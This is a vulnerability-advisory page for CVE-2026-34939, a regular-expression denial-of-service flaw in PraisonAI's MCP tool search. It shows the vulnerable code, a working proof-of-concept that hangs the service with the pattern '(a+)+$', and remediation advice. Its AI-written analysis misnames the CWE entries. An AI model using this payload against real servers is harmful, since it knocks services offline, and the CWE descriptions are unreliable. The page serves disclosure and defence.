Skip to main content

Python CVE-2026-34939

MEDIUM
Inefficient Regular Expression Complexity (ReDoS) (CWE-1333)
2026-04-01 https://github.com/MervinPraison/PraisonAI GHSA-8w9j-hc3g-3g7f
6.5
CVSS 3.1 · GitHub Advisory
Share

Severity by source

GitHub Advisory PRIMARY
6.5 MEDIUM
AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

Primary rating from GitHub Advisory · only source for this CVE.

CVSS VectorGitHub Advisory

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H
Attack Vector
Network
Attack Complexity
Low
Privileges Required
Low
User Interaction
None
Scope
Unchanged
Confidentiality
None
Integrity
None
Availability
High

Lifecycle Timeline

3
Patch released
Apr 02, 2026 - 14:30 nvd
Patch available
Analysis Generated
Apr 02, 2026 - 00:15 vuln.today
CVE Published
Apr 01, 2026 - 23:21 nvd
MEDIUM 6.5

DescriptionGitHub Advisory

Summary

MCPToolIndex.search_tools() compiles a caller-supplied string directly as a Python regular expression with no validation, sanitization, or timeout. A crafted regex causes catastrophic backtracking in the re engine, blocking the Python thread for hundreds of seconds and causing a complete service outage.

Details

tool_index.py:365 (source) -> tool_index.py:368 (sink)

python
# source -- query taken directly from caller, no validation
def search_tools(self, query: str) -> List[ToolInfo]:
    import re
# sink -- compiled and applied with no timeout or exception handling
    pattern = re.compile(query, re.IGNORECASE)
    for tool in self.get_all_tools():
        if pattern.search(tool.name) or pattern.search(tool.hint):
            matches.append(tool)

PoC

python
# tested on: praisonai==1.5.87 (source install)
# install: pip install -e src/praisonai
import sys, time, json
sys.path.insert(0, 'src/praisonai')
from pathlib import Path

mcp_dir = Path.home() / '.praison' / 'mcp' / 'servers' / 'test_server'
mcp_dir.mkdir(parents=True, exist_ok=True)
(mcp_dir / '_index.json').write_text(json.dumps([
    {"name": "a" * 30 + "!", "hint": "a" * 30 + "!", "server": "test_server"}
]))
(mcp_dir / '_status.json').write_text(json.dumps({
    "server": "test_server", "available": True, "auth_required": False,
    "last_sync": time.time(), "tool_count": 1, "error": None
}))

from praisonai.mcp_server.tool_index import MCPToolIndex
index = MCPToolIndex()

start = time.monotonic()
results = index.search_tools("(a+)+$")
print(f"Returned in {time.monotonic() - start:.1f}s")
# expected output: Returned in 376.0s

Impact

A single crafted query blocks the Python thread for hundreds of seconds, causing a complete service outage for the duration. The MCP server HTTP transport runs without an API key by default, making this reachable by any attacker on the network. Repeated requests sustain the DoS indefinitely.

AnalysisAI

Denial of service in PraisonAI's MCPToolIndex.search_tools() allows authenticated remote attackers to block the Python thread for hundreds of seconds via a crafted regular expression causing catastrophic backtracking. The vulnerable function compiles caller-supplied query strings directly as regex patterns without validation, timeout, or exception handling. A single malicious request can sustain complete service outage, and the MCP server HTTP transport runs without authentication by default, significantly lowering the practical barrier to exploitation despite the CVSS requiring PR:L.

Technical ContextAI

The vulnerability stems from unsafe regex compilation in Python's re module. When re.compile() processes a maliciously crafted pattern such as (a+)+$ against a string like thirty 'a' characters followed by '!', the regex engine enters catastrophic backtracking - exponential retry paths as quantified groups nest and fail to match. The root cause (CWE-1333: Improper Restriction of Rendered UI Layers or Frames) is actually a misclassification; this is fundamentally CWE-1256 (Regular Expression Denial of Service) or CWE-400 (Uncontrolled Resource Consumption). The Python re module lacks built-in backtracking limits; the standard library regex module offers timeouts via the timeout parameter, but the vulnerable code uses only the default re module. PraisonAI (pip package praisonai version 1.5.87 and earlier) integrates this in tool_index.py:365-368 where the search_tools() method accepts an untrusted query parameter and applies it directly without sanitization or resource limits.

RemediationAI

Apply vendor patch to sanitize or restrict regex input. The primary fix is to validate the query parameter before regex compilation: reject or escape regex metacharacters, implement a whitelist of allowed search patterns (e.g., simple string literals), or use a safe regex library with configurable backtracking limits (e.g., Python's regex module with timeout parameter). Immediate workaround: wrap the re.compile() and pattern.search() calls in a timeout using signal.alarm() on Unix systems or threading.Timer for cross-platform protection, allowing queries to abort after 1-5 seconds. For deployments: enable HTTP authentication in the MCP server configuration and restrict network access to the tool search endpoint. Users should upgrade to a patched version of PraisonAI once released. See the vendor advisory at https://github.com/MervinPraison/PraisonAI/security/advisories/GHSA-8w9j-hc3g-3g7f for confirmation and any released patch details.

More in Python

View all
CVE-2025-24016 CRITICAL POC
9.9 Feb 10

Wazuh SIEM platform versions 4.4.0 through 4.9.0 contain an unsafe deserialization vulnerability in the DistributedAPI t

CVE-2025-27520 CRITICAL POC
9.8 Apr 04

BentoML version 1.4.2 and earlier contains an unauthenticated remote code execution vulnerability through insecure deser

CVE-2025-2945 CRITICAL POC
9.9 Apr 03

pgAdmin 4 contains critical remote code execution vulnerabilities in the Query Tool download and Cloud Deployment endpoi

CVE-2013-5093 MEDIUM POC
6.8 Sep 27

The renderLocalView function in render/views.py in graphite-web in Graphite 0.9.5 through 0.9.10 uses the pickle Python

CVE-2025-32375 CRITICAL POC
9.8 Apr 09

BentoML is a Python library for building online serving systems optimized for AI apps and model inference. Rated critica

CVE-2014-0224 HIGH POC
7.4 Jun 05

OpenSSL before 0.9.8za, 1.0.0 before 1.0.0m, and 1.0.1 before 1.0.1h does not properly restrict processing of ChangeCiph

CVE-2024-21644 HIGH POC
7.5 Jan 08

pyLoad download manager version prior to 0.5.0b3.dev77 exposes the Flask SECRET_KEY through an unauthenticated endpoint.

CVE-2017-9462 HIGH POC
8.8 Jun 06

In Mercurial before 4.1.3, "hg serve --stdio" allows remote authenticated users to launch the Python debugger, and conse

CVE-2026-39987 CRITICAL POC
9.3 Apr 08

Unauthenticated remote code execution in Marimo ≤0.20.4 allows attackers to execute arbitrary system commands via the `/

CVE-2024-21645 MEDIUM POC
5.3 Jan 08

pyLoad is the free and open-source Download Manager written in pure Python. Rated medium severity (CVSS 5.3), this vulne

CVE-2026-33017 CRITICAL POC
9.3 Mar 17

Langflow (a visual LLM pipeline builder) contains a critical unauthenticated code execution vulnerability (CVE-2026-3301

CVE-2026-55255 HIGH POC
8.4 Jun 19

Cross-user flow execution in Langflow (< 1.9.1) lets any authenticated API-key holder run another user's flow by passing

Share

CVE-2026-34939 vulnerability details – vuln.today

This site uses cookies essential for authentication and security. No tracking or analytics cookies are used. Privacy Policy